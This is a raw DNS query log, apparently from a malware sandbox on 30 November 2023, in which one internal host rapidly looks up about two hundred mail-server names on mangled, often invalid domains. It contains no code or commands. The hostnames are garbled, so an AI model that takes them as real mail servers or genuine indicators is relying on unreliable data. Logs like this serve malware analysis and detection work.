Nov 30, 2023 11:22:44.714066029 CET	192.168.2.4	1.1.1.1	0x16fc	Standard query (0)	mailgate.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.714205980 CET	192.168.2.4	1.1.1.1	0x612e	Standard query (0)	pop3.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.718933105 CET	192.168.2.4	1.1.1.1	0x1ff0	Standard query (0)	relay.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.719978094 CET	192.168.2.4	1.1.1.1	0xe1b4	Standard query (0)	pop3.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.720048904 CET	192.168.2.4	1.1.1.1	0x9c54	Standard query (0)	imap.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.720680952 CET	192.168.2.4	1.1.1.1	0x483f	Standard query (0)	imap.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.722001076 CET	192.168.2.4	1.1.1.1	0x71c2	Standard query (0)	imap.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.736959934 CET	192.168.2.4	1.1.1.1	0xb6f4	Standard query (0)	pop3.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.737282038 CET	192.168.2.4	1.1.1.1	0xeac8	Standard query (0)	pop3.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.772478104 CET	192.168.2.4	1.1.1.1	0x5c01	Standard query (0)	pop3.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.780034065 CET	192.168.2.4	1.1.1.1	0xa686	Standard query (0)	mail.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.822549105 CET	192.168.2.4	1.1.1.1	0x89b8	Standard query (0)	pop3.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.823471069 CET	192.168.2.4	1.1.1.1	0x8a33	Standard query (0)	imap.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.857489109 CET	192.168.2.4	1.1.1.1	0x936	Standard query (0)	mailgate.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.857551098 CET	192.168.2.4	1.1.1.1	0x2b44	Standard query (0)	pop3.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.857708931 CET	192.168.2.4	1.1.1.1	0xbf5f	Standard query (0)	pop3.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.880661011 CET	192.168.2.4	1.1.1.1	0xdfb4	Standard query (0)	pop3.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.913738966 CET	192.168.2.4	1.1.1.1	0x7065	Standard query (0)	mailgate.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.915577888 CET	192.168.2.4	1.1.1.1	0xc228	Standard query (0)	pop3.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.917393923 CET	192.168.2.4	1.1.1.1	0xddd1	Standard query (0)	relay.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.924515009 CET	192.168.2.4	1.1.1.1	0xb24e	Standard query (0)	mailgate.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.925733089 CET	192.168.2.4	1.1.1.1	0x588c	Standard query (0)	pop3.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.928945065 CET	192.168.2.4	1.1.1.1	0xe004	Standard query (0)	relay.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.937911034 CET	192.168.2.4	1.1.1.1	0x50e1	Standard query (0)	pop3.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.950304031 CET	192.168.2.4	1.1.1.1	0xa0ee	Standard query (0)	pop3.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:44.985028028 CET	192.168.2.4	1.1.1.1	0xa845	Standard query (0)	relay.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.057125092 CET	192.168.2.4	1.1.1.1	0x20ab	Standard query (0)	mail.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.063025951 CET	192.168.2.4	1.1.1.1	0xa790	Standard query (0)	mail.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.063877106 CET	192.168.2.4	1.1.1.1	0x3d49	Standard query (0)	mail.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.065521002 CET	192.168.2.4	1.1.1.1	0x4979	Standard query (0)	mail.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.069075108 CET	192.168.2.4	1.1.1.1	0x3b29	Standard query (0)	imap.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.082246065 CET	192.168.2.4	1.1.1.1	0x62b4	Standard query (0)	mail.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.094955921 CET	192.168.2.4	1.1.1.1	0x6993	Standard query (0)	mail.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.112232924 CET	192.168.2.4	1.1.1.1	0xf2a5	Standard query (0)	pop3.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.114196062 CET	192.168.2.4	1.1.1.1	0x3e6a	Standard query (0)	mail.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.115597963 CET	192.168.2.4	1.1.1.1	0xc501	Standard query (0)	mail.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.115808964 CET	192.168.2.4	1.1.1.1	0x2de9	Standard query (0)	mail.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.116046906 CET	192.168.2.4	1.1.1.1	0xb579	Standard query (0)	mail.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.117257118 CET	192.168.2.4	1.1.1.1	0xc2ab	Standard query (0)	mail.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.117928982 CET	192.168.2.4	1.1.1.1	0x101f	Standard query (0)	mail.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.118310928 CET	192.168.2.4	1.1.1.1	0x9d65	Standard query (0)	mail.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.118537903 CET	192.168.2.4	1.1.1.1	0x148f	Standard query (0)	mail.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.119024992 CET	192.168.2.4	1.1.1.1	0xc96e	Standard query (0)	mail.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.141391993 CET	192.168.2.4	1.1.1.1	0x5dcf	Standard query (0)	mail.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.169610977 CET	192.168.2.4	1.1.1.1	0x5c01	Standard query (0)	pop3.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.169668913 CET	192.168.2.4	1.1.1.1	0xb24e	Standard query (0)	mailgate.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.169905901 CET	192.168.2.4	1.1.1.1	0xe004	Standard query (0)	relay.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.170468092 CET	192.168.2.4	1.1.1.1	0xd056	Standard query (0)	mail.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.172864914 CET	192.168.2.4	1.1.1.1	0x8fe5	Standard query (0)	mail.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.173634052 CET	192.168.2.4	1.1.1.1	0xb33d	Standard query (0)	mailgate.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.173923969 CET	192.168.2.4	1.1.1.1	0x46c8	Standard query (0)	mailgate.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.174350977 CET	192.168.2.4	1.1.1.1	0x73e5	Standard query (0)	mail.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.174578905 CET	192.168.2.4	1.1.1.1	0x948b	Standard query (0)	mail.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.174839020 CET	192.168.2.4	1.1.1.1	0xd439	Standard query (0)	smtp.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.219777107 CET	192.168.2.4	1.1.1.1	0x78e3	Standard query (0)	mail.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.220707893 CET	192.168.2.4	1.1.1.1	0x3974	Standard query (0)	mail.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.221322060 CET	192.168.2.4	1.1.1.1	0x397	Standard query (0)	mail.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.221587896 CET	192.168.2.4	1.1.1.1	0xffdd	Standard query (0)	mail.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.223208904 CET	192.168.2.4	1.1.1.1	0xb1d8	Standard query (0)	mail.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.223475933 CET	192.168.2.4	1.1.1.1	0x6581	Standard query (0)	mail.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.223838091 CET	192.168.2.4	1.1.1.1	0x39e3	Standard query (0)	mail.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.223838091 CET	192.168.2.4	1.1.1.1	0x4b16	Standard query (0)	mail.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.223997116 CET	192.168.2.4	1.1.1.1	0x437c	Standard query (0)	mail.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.226464033 CET	192.168.2.4	1.1.1.1	0xdd10	Standard query (0)	mail.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.226676941 CET	192.168.2.4	1.1.1.1	0x6668	Standard query (0)	mail.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.228574038 CET	192.168.2.4	1.1.1.1	0xd338	Standard query (0)	mail.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.229020119 CET	192.168.2.4	1.1.1.1	0xe067	Standard query (0)	mail.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.229655981 CET	192.168.2.4	1.1.1.1	0x6d38	Standard query (0)	mail.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.229851007 CET	192.168.2.4	1.1.1.1	0x25e2	Standard query (0)	mail.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.230079889 CET	192.168.2.4	1.1.1.1	0x7bc8	Standard query (0)	relay.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.231832981 CET	192.168.2.4	1.1.1.1	0x6c39	Standard query (0)	mail.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.232196093 CET	192.168.2.4	1.1.1.1	0x5210	Standard query (0)	mail.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.234631062 CET	192.168.2.4	1.1.1.1	0xfc71	Standard query (0)	mail.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.235388041 CET	192.168.2.4	1.1.1.1	0x6de8	Standard query (0)	mailgate.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.236535072 CET	192.168.2.4	1.1.1.1	0xa812	Standard query (0)	mailgate.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.237514973 CET	192.168.2.4	1.1.1.1	0x3e7	Standard query (0)	mailgate.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.241183043 CET	192.168.2.4	1.1.1.1	0x90c3	Standard query (0)	mail.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.241513968 CET	192.168.2.4	1.1.1.1	0x4050	Standard query (0)	mail.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.241910934 CET	192.168.2.4	1.1.1.1	0x4a3d	Standard query (0)	mail.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.242474079 CET	192.168.2.4	1.1.1.1	0x593f	Standard query (0)	mailgate.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.242727995 CET	192.168.2.4	1.1.1.1	0xc9e1	Standard query (0)	mailgate.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.243695021 CET	192.168.2.4	1.1.1.1	0x385b	Standard query (0)	mailgate.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.244210958 CET	192.168.2.4	1.1.1.1	0xa81f	Standard query (0)	mailgate.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.412297964 CET	192.168.2.4	1.1.1.1	0xf2a5	Standard query (0)	pop3.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.419802904 CET	192.168.2.4	1.1.1.1	0x42b1	Standard query (0)	mail.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.420814991 CET	192.168.2.4	1.1.1.1	0xc6d2	Standard query (0)	mail.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.421015978 CET	192.168.2.4	1.1.1.1	0xab44	Standard query (0)	mail.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.427202940 CET	192.168.2.4	1.1.1.1	0x1dcc	Standard query (0)	mail.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.427675962 CET	192.168.2.4	1.1.1.1	0xace7	Standard query (0)	mail.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.428100109 CET	192.168.2.4	1.1.1.1	0x98fa	Standard query (0)	mail.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.428457975 CET	192.168.2.4	1.1.1.1	0xc618	Standard query (0)	pop3.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.428849936 CET	192.168.2.4	1.1.1.1	0xdb85	Standard query (0)	mail.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.432317019 CET	192.168.2.4	1.1.1.1	0xd7e2	Standard query (0)	mail.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.437207937 CET	192.168.2.4	1.1.1.1	0xdfc2	Standard query (0)	mail.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.439825058 CET	192.168.2.4	1.1.1.1	0x6b5f	Standard query (0)	mailgate.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.461085081 CET	192.168.2.4	1.1.1.1	0x9c8e	Standard query (0)	mailgate.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.477102995 CET	192.168.2.4	1.1.1.1	0xa9ce	Standard query (0)	mailgate.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.478523970 CET	192.168.2.4	1.1.1.1	0x6ccb	Standard query (0)	mailgate.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.554975033 CET	192.168.2.4	1.1.1.1	0x6581	Standard query (0)	mail.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.557070971 CET	192.168.2.4	1.1.1.1	0x159	Standard query (0)	relay.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.567692995 CET	192.168.2.4	1.1.1.1	0x5cf4	Standard query (0)	pop3.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.568804979 CET	192.168.2.4	1.1.1.1	0xd491	Standard query (0)	mailgate.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.569274902 CET	192.168.2.4	1.1.1.1	0xfa5a	Standard query (0)	mailgate.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.583945036 CET	192.168.2.4	1.1.1.1	0x2a64	Standard query (0)	mailgate.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.623261929 CET	192.168.2.4	1.1.1.1	0x8600	Standard query (0)	mailgate.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.725567102 CET	192.168.2.4	1.1.1.1	0xc618	Standard query (0)	pop3.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.725567102 CET	192.168.2.4	1.1.1.1	0xa9ce	Standard query (0)	mailgate.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.737122059 CET	192.168.2.4	1.1.1.1	0x66c4	Standard query (0)	mailgate.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.737313986 CET	192.168.2.4	1.1.1.1	0x3d04	Standard query (0)	mailgate.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.737947941 CET	192.168.2.4	1.1.1.1	0xcd62	Standard query (0)	relay.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.739115000 CET	192.168.2.4	1.1.1.1	0xa266	Standard query (0)	mailgate.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.740597963 CET	192.168.2.4	1.1.1.1	0x6610	Standard query (0)	mailgate.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.741113901 CET	192.168.2.4	1.1.1.1	0x8514	Standard query (0)	mailgate.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.775477886 CET	192.168.2.4	1.1.1.1	0x4bd3	Standard query (0)	mailgate.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.779042006 CET	192.168.2.4	1.1.1.1	0xe847	Standard query (0)	mailgate.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.785264015 CET	192.168.2.4	1.1.1.1	0xe332	Standard query (0)	smtp.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.786395073 CET	192.168.2.4	1.1.1.1	0xff42	Standard query (0)	mailgate.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.786395073 CET	192.168.2.4	1.1.1.1	0x4b71	Standard query (0)	mailgate.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.787489891 CET	192.168.2.4	1.1.1.1	0x4079	Standard query (0)	smtp.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.787489891 CET	192.168.2.4	1.1.1.1	0xc150	Standard query (0)	mailgate.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.788062096 CET	192.168.2.4	1.1.1.1	0xb44a	Standard query (0)	mailgate.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.788721085 CET	192.168.2.4	1.1.1.1	0x1b12	Standard query (0)	relay.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.788721085 CET	192.168.2.4	1.1.1.1	0x1217	Standard query (0)	mailgate.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.789309025 CET	192.168.2.4	1.1.1.1	0xd57	Standard query (0)	mailgate.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.789535046 CET	192.168.2.4	1.1.1.1	0xd145	Standard query (0)	mailgate.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.790061951 CET	192.168.2.4	1.1.1.1	0xaf0a	Standard query (0)	relay.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.790589094 CET	192.168.2.4	1.1.1.1	0x512	Standard query (0)	mailgate.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.792181015 CET	192.168.2.4	1.1.1.1	0xfda2	Standard query (0)	mailgate.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.800256968 CET	192.168.2.4	1.1.1.1	0x9b43	Standard query (0)	mailgate.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.800817966 CET	192.168.2.4	1.1.1.1	0xb239	Standard query (0)	mailgate.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.801527977 CET	192.168.2.4	1.1.1.1	0x169b	Standard query (0)	mailgate.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.802525043 CET	192.168.2.4	1.1.1.1	0x3f7a	Standard query (0)	mailgate.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.803654909 CET	192.168.2.4	1.1.1.1	0x77ee	Standard query (0)	mailgate.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.804565907 CET	192.168.2.4	1.1.1.1	0xfdef	Standard query (0)	relay.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.810365915 CET	192.168.2.4	1.1.1.1	0xbca2	Standard query (0)	pop3.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.812145948 CET	192.168.2.4	1.1.1.1	0x1684	Standard query (0)	mailgate.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.812681913 CET	192.168.2.4	1.1.1.1	0xe8e0	Standard query (0)	mailgate.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.814074039 CET	192.168.2.4	1.1.1.1	0x546d	Standard query (0)	relay.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.820290089 CET	192.168.2.4	1.1.1.1	0xa83	Standard query (0)	mailgate.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.820719004 CET	192.168.2.4	1.1.1.1	0x5707	Standard query (0)	mailgate.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.821544886 CET	192.168.2.4	1.1.1.1	0x9b37	Standard query (0)	mailgate.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.822511911 CET	192.168.2.4	1.1.1.1	0x5e69	Standard query (0)	mailgate.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.822639942 CET	192.168.2.4	1.1.1.1	0x5399	Standard query (0)	mailgate.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.823337078 CET	192.168.2.4	1.1.1.1	0xffe9	Standard query (0)	mailgate.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.825593948 CET	192.168.2.4	1.1.1.1	0xd052	Standard query (0)	mailgate.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.915075064 CET	192.168.2.4	1.1.1.1	0x5665	Standard query (0)	mailgate.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.915194988 CET	192.168.2.4	1.1.1.1	0xe281	Standard query (0)	mailgate.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.915501118 CET	192.168.2.4	1.1.1.1	0xb39d	Standard query (0)	mailgate.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.915822983 CET	192.168.2.4	1.1.1.1	0x88c2	Standard query (0)	relay.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.916152954 CET	192.168.2.4	1.1.1.1	0xeca4	Standard query (0)	smtp.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.918931007 CET	192.168.2.4	1.1.1.1	0x27eb	Standard query (0)	smtp.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.974229097 CET	192.168.2.4	1.1.1.1	0x9a14	Standard query (0)	mailgate.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.977571964 CET	192.168.2.4	1.1.1.1	0xa6b2	Standard query (0)	relay.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.978250980 CET	192.168.2.4	1.1.1.1	0x5c1f	Standard query (0)	mailgate.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.980463028 CET	192.168.2.4	1.1.1.1	0x1799	Standard query (0)	mailgate.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.990199089 CET	192.168.2.4	1.1.1.1	0xc49c	Standard query (0)	mailgate.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.991358995 CET	192.168.2.4	1.1.1.1	0x9660	Standard query (0)	mailgate.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.992796898 CET	192.168.2.4	1.1.1.1	0xf15d	Standard query (0)	mailgate.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.037025928 CET	192.168.2.4	1.1.1.1	0xe332	Standard query (0)	smtp.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.037223101 CET	192.168.2.4	1.1.1.1	0xb44a	Standard query (0)	mailgate.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.037223101 CET	192.168.2.4	1.1.1.1	0x4b71	Standard query (0)	mailgate.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.037223101 CET	192.168.2.4	1.1.1.1	0xaf0a	Standard query (0)	relay.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.042660952 CET	192.168.2.4	1.1.1.1	0xd089	Standard query (0)	mailgate.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.044222116 CET	192.168.2.4	1.1.1.1	0xdd34	Standard query (0)	mail.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.050194979 CET	192.168.2.4	1.1.1.1	0xbbb0	Standard query (0)	relay.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.118007898 CET	192.168.2.4	1.1.1.1	0xbca2	Standard query (0)	pop3.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.118007898 CET	192.168.2.4	1.1.1.1	0xa83	Standard query (0)	mailgate.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.119354963 CET	192.168.2.4	1.1.1.1	0x2eb8	Standard query (0)	smtp.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.140053034 CET	192.168.2.4	1.1.1.1	0x2e2c	Standard query (0)	mailgate.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.142365932 CET	192.168.2.4	1.1.1.1	0x3d58	Standard query (0)	mailgate.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.143762112 CET	192.168.2.4	1.1.1.1	0xdbe0	Standard query (0)	smtp.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.145359039 CET	192.168.2.4	1.1.1.1	0xc775	Standard query (0)	mail.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.147044897 CET	192.168.2.4	1.1.1.1	0x758c	Standard query (0)	relay.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.150183916 CET	192.168.2.4	1.1.1.1	0x5796	Standard query (0)	mail.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.150413990 CET	192.168.2.4	1.1.1.1	0xe1ff	Standard query (0)	mail.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.151391983 CET	192.168.2.4	1.1.1.1	0xeff3	Standard query (0)	mail.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.155348063 CET	192.168.2.4	1.1.1.1	0x84f4	Standard query (0)	mail.a0i.com	A (IP address)	IN (0x0001)	false
